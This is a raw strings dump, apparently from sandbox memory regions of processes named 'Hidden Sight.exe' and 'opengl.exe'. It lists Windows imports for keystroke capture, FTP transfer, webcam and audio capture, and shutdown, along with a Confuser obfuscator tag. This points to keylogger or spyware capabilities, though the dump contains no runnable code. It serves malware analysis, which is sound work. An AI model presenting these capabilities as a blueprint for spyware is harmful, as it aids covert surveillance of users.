MsgWaitForMultipleObjects

MapVirtualKeyA

MapVirtualKeyA

GetKeyboardState

GetKeyboardState

GetKeyboardLayoutNameA

GetKeyboardLayoutNameA

GetKeyState

GetKeyState

GetAsyncKeyState

GetAsyncKeyState

ExitWindowsEx

ExitWindowsEx

EnumWindows

EnumWindows

FtpGetFileSize

FtpGetFileSize

FtpSetCurrentDirectoryA

FtpSetCurrentDirectoryA

FtpOpenFileA

FtpOpenFileA

%( % & % % % ]

%( % & % % % ]

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

hbS%S

hbS%S

advapi32.dll

advapi32.dll

AVICAP32.DLL

AVICAP32.DLL

gdi32.dll

gdi32.dll

gdiplus.dll

gdiplus.dll

mpr.dll

mpr.dll

msacm32.dll

msacm32.dll

ole32.dll

ole32.dll

oleaut32.dll

oleaut32.dll

powrprof.dll

powrprof.dll

user32.dll

user32.dll

wininet.dll

wininet.dll

winmm.dll

winmm.dll

wsock32.dll

wsock32.dll

HIDDEN SIGHT.EXE_1944_rwx_0052B000_00001000:

v4.0.30319

v4.0.30319

HIDDEN SIGHT.EXE_1944_rwx_00547000_00001000:

$cafe90b6-600b-4b43-8793-7744248ac619

$cafe90b6-600b-4b43-8793-7744248ac619

cHidden Sight is a PE protection tool which will help you protect your exe files from decompilation.

cHidden Sight is a PE protection tool which will help you protect your exe files from decompilation.

.NETFramework,Version=v4.0

.NETFramework,Version=v4.0

.NET Framework 4

.NET Framework 4

1.0.0.0

1.0.0.0

Confuser v1.9.0.0

Confuser v1.9.0.0

ntdll.dll

ntdll.dll

OPENGL.EXE_1300_rwx_009BA000_00002000:

.eOyXPRV

.eOyXPRV

OPENGL.EXE_1300_rwx_675A6000_00003000:

.Qg<-Qg><pre>*Rg`.Rg|)RgL Rg</pre></-Qg>